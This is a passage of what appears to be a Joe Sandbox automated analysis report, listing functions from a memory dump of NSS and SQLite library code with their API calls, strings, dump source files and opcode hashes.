                                                                                                                                                • Part of subcall function 6C75FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C75FE29
                                                                                                                                                • Part of subcall function 6C75FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C75FE3D
                                                                                                                                                • Part of subcall function 6C75FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C75FE6F
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C706E4C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76116E
                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C828FE0,00000000), ref: 6C706E82
                                                                                                                                                • Part of subcall function 6C706AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C70B21D,00000000,00000000,6C70B219,?,6C706BFB,00000000,?,00000000,00000000,?,?,?,6C70B21D), ref: 6C706B01
                                                                                                                                                • Part of subcall function 6C706AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C706B8A
                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C706F1E
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C706F35
                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C828FE0,00000000), ref: 6C706F6B
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,6C707D8F,?,?), ref: 6C706FE1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 587344769-0
                                                                                                                                              • Opcode ID: 3f25f0f97af0a179ac95c4ee10e38461f9f8746b4b5b67b2375b7150c0c32e6a
                                                                                                                                              • Instruction ID: fe878ca64825f1aa36d2ca572a45e191b3c442ffcc7bfc4682762650e52c169f
                                                                                                                                              • Opcode Fuzzy Hash: 3f25f0f97af0a179ac95c4ee10e38461f9f8746b4b5b67b2375b7150c0c32e6a
                                                                                                                                              • Instruction Fuzzy Hash: EF715EB1E106469BDB00CF55CE54BAABBE4BF54348F154229EC08D7B11E770EAD5CB90
                                                                                                                                              Function 6C74ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE10
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE24
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,6C72D079,00000000,00000001), ref: 6C74AE5A
                                                                                                                                              • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE6F
                                                                                                                                              • free.MOZGLUE(85145F8B,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE7F
                                                                                                                                              • TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEB1
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEC9
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEF1
                                                                                                                                              • free.MOZGLUE(6C72CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C72CDBB,?), ref: 6C74AF0B
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AF30
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 161582014-0
                                                                                                                                              • Opcode ID: 5501cb47128c6dd54140df602d6fca9b82420ef51fbaff7586fe24cbd62293ae
                                                                                                                                              • Instruction ID: 54ec794f83882ebc7186815bb25590ebdd187a8eb99eebcb1a3ba911c9760790
                                                                                                                                              • Opcode Fuzzy Hash: 5501cb47128c6dd54140df602d6fca9b82420ef51fbaff7586fe24cbd62293ae
                                                                                                                                              • Instruction Fuzzy Hash: 8D51CFB5A00602AFDB11DF25C985B5AB7B4FF08328F148674E81897E12E731F864CBD1
                                                                                                                                              Function 6C724CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C72AB7F,?,00000000,?), ref: 6C724CB4
                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6C72AB7F,?,00000000,?), ref: 6C724CC8
                                                                                                                                              • TlsGetValue.KERNEL32(?,6C72AB7F,?,00000000,?), ref: 6C724CE0
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6C72AB7F,?,00000000,?), ref: 6C724CF4
                                                                                                                                              • PL_HashTableLookup.NSS3(?,?,?,6C72AB7F,?,00000000,?), ref: 6C724D03
                                                                                                                                              • PR_Unlock.NSS3(?,00000000,?), ref: 6C724D10
                                                                                                                                                • Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
                                                                                                                                                • Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
                                                                                                                                              • PR_Now.NSS3(?,00000000,?), ref: 6C724D26
                                                                                                                                                • Part of subcall function 6C7C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DC6
                                                                                                                                                • Part of subcall function 6C7C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DD1
                                                                                                                                                • Part of subcall function 6C7C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C9DED
                                                                                                                                              • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C724D98
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C724DDA
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C724E02
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4032354334-0
                                                                                                                                              • Opcode ID: 9eade404a8e13dfa4fa9b2232f993ad6bb35e7e66abba1e43261c39acb0a5f6a
                                                                                                                                              • Instruction ID: f5a25cb7bbef2e90dc8e50234d9b43a3a7e07876ed2cb0eddf4c44797607c386
                                                                                                                                              • Opcode Fuzzy Hash: 9eade404a8e13dfa4fa9b2232f993ad6bb35e7e66abba1e43261c39acb0a5f6a
                                                                                                                                              • Instruction Fuzzy Hash: F341E7B6E00101ABEB119F28ED49A6677B9FF1525CF094170ED0887B12FB35D919CBE2
                                                                                                                                              Function 6C6EFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6C6EFD18
                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6C6EFD5F
                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6EFD89
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C6EFD99
                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6C6EFE3C
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C6EFEE3
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C6EFEEE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                              • String ID: simple
                                                                                                                                              • API String ID: 1130978851-3246079234
                                                                                                                                              • Opcode ID: daed3144ba34dc3fa538d517997786fc56f5a2dd4e61d240870586f75c73d74e
                                                                                                                                              • Instruction ID: a73b66d2906c763e0c731dcb41cdf67467ad543f51097fd0e9f48fc617743e4c
                                                                                                                                              • Opcode Fuzzy Hash: daed3144ba34dc3fa538d517997786fc56f5a2dd4e61d240870586f75c73d74e
                                                                                                                                              • Instruction Fuzzy Hash: 5491B5B0E062059FDB04CF55D880AAAFBF1FF89318F24C56AD8199B752D731E902CB95
                                                                                                                                              Function 6C6F5CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C6F5EC9
                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6F5EED
                                                                                                                                              Strings
                                                                                                                                              • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C6F5E64
                                                                                                                                              • misuse, xrefs: 6C6F5EDB
                                                                                                                                              • API call with %s database connection pointer, xrefs: 6C6F5EC3
                                                                                                                                              • invalid, xrefs: 6C6F5EBE
                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C6F5EE0
                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6F5ED1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                              • API String ID: 632333372-1982981357
                                                                                                                                              • Opcode ID: 07d0e0508a83687ef75b41289a50a6352f45bf652285841c4fb3b93acced5756
                                                                                                                                              • Instruction ID: 993b2002747fdff1d6e2096486cac26014bf525d0b290649534c039adf4f7a5d
                                                                                                                                              • Opcode Fuzzy Hash: 07d0e0508a83687ef75b41289a50a6352f45bf652285841c4fb3b93acced5756
                                                                                                                                              • Instruction Fuzzy Hash: FA81B130B076119BEB198E15C848BAA77B2BF4270CF198269D8255BB51C730EC43CBED
                                                                                                                                              Function 6C6DDCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6DDDF9
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DDE68
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DDE97
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C6DDEB6
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6DDF78
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 1526119172-598938438
                                                                                                                                              • Opcode ID: db3017bd3fdb4a0d527e2ccdf42e4cc2ee91930417b68b7a5b5cad222e424a76
                                                                                                                                              • Instruction ID: ac46b0ca57a66bfc453108ebe0c7d21b207417f00092de4cc0b7030810110ab0
                                                                                                                                              • Opcode Fuzzy Hash: db3017bd3fdb4a0d527e2ccdf42e4cc2ee91930417b68b7a5b5cad222e424a76
                                                                                                                                              • Instruction Fuzzy Hash: 3281D9716043119FDB14EF25C880B6A77F1BF85308F16886DE89987B51E731F845CBA6
                                                                                                                                              Function 6C764DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C76536F,00000022,?,?,00000000,?), ref: 6C764E70
                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C764F28
                                                                                                                                              • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C764F8E
                                                                                                                                              • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C764FAE
                                                                                                                                              • free.MOZGLUE(?), ref: 6C764FC8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                              • String ID: %s=%c%s%c$%s=%s$oSvl"
                                                                                                                                              • API String ID: 2709355791-1883948470
                                                                                                                                              • Opcode ID: 221691c203c2a318b34de709888bce658b95a63137842f322950838bac3c94ec
                                                                                                                                              • Instruction ID: ae9ef4ba140676945009b22616c34bb4eee5df94caa45139dfee78e9cae2c2d2
                                                                                                                                              • Opcode Fuzzy Hash: 221691c203c2a318b34de709888bce658b95a63137842f322950838bac3c94ec
                                                                                                                                              • Instruction Fuzzy Hash: 07513831A452458BEF01CA6BC6B07FF7BF99F46308F188136EC94A7F41D32588499791
                                                                                                                                              Function 6C703E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C7040D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C703F7F,?,00000055,?,?,6C701666,?,?), ref: 6C7040D9
                                                                                                                                                • Part of subcall function 6C7040D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C701666,?,?), ref: 6C7040FC
                                                                                                                                                • Part of subcall function 6C7040D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C701666,?,?), ref: 6C704138
                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C703EC2
                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C703ED6
                                                                                                                                                • Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C703EEE
                                                                                                                                                • Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
                                                                                                                                                • Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1
                                                                                                                                              • PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C703F02
                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6C703F14
                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6C703F1C
                                                                                                                                                • Part of subcall function 6C7664F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C76127C,00000000,00000000,00000000), ref: 6C76650E
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C703F27
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
                                                                                                                                              • String ID: security
                                                                                                                                              • API String ID: 1076417423-3315324353
                                                                                                                                              • Opcode ID: 935ba537dc96562642d3f969817fdf63b61e9442a944089f73250fa584bfa2da
                                                                                                                                              • Instruction ID: 6fc9c42d5b0311e2f13885ded6ba45c189f23c0063ae00a76e12e20007efa91b
                                                                                                                                              • Opcode Fuzzy Hash: 935ba537dc96562642d3f969817fdf63b61e9442a944089f73250fa584bfa2da
                                                                                                                                              • Instruction Fuzzy Hash: 2921F8B2A04300ABD7148B15AD09FAB77A8BB4971CF44093DF959A7B41E730E618879A
                                                                                                                                              Function 6C74CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C74CD08
                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6C74CE16
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C74D079
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1351604052-0
                                                                                                                                              • Opcode ID: 3b5166052e4fe789b73349b869cde41bceacf460ffecf59a3c84ef3a51779d4e
                                                                                                                                              • Instruction ID: 9c91fa441209e0453d0a3962e0650bcf71c919b157c09a8c164bbd1191e66a4b
                                                                                                                                              • Opcode Fuzzy Hash: 3b5166052e4fe789b73349b869cde41bceacf460ffecf59a3c84ef3a51779d4e
                                                                                                                                              • Instruction Fuzzy Hash: B2C1A0B1A002199BDB20CF24CD84BDAB7B4BF48318F1481A8E94897751E775EE99CF94
                                                                                                                                              Function 6C73DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C7497C1,?,00000000,00000000,?,?,?,00000000,?,6C727F4A,00000000), ref: 6C73DC68
                                                                                                                                                • Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
                                                                                                                                                • Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15
                                                                                                                                              • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DD36
                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DE2D
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DE43
                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DE76
                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DF32
                                                                                                                                              • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DF5F
                                                                                                                                              • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DF78
                                                                                                                                              • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DFAA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
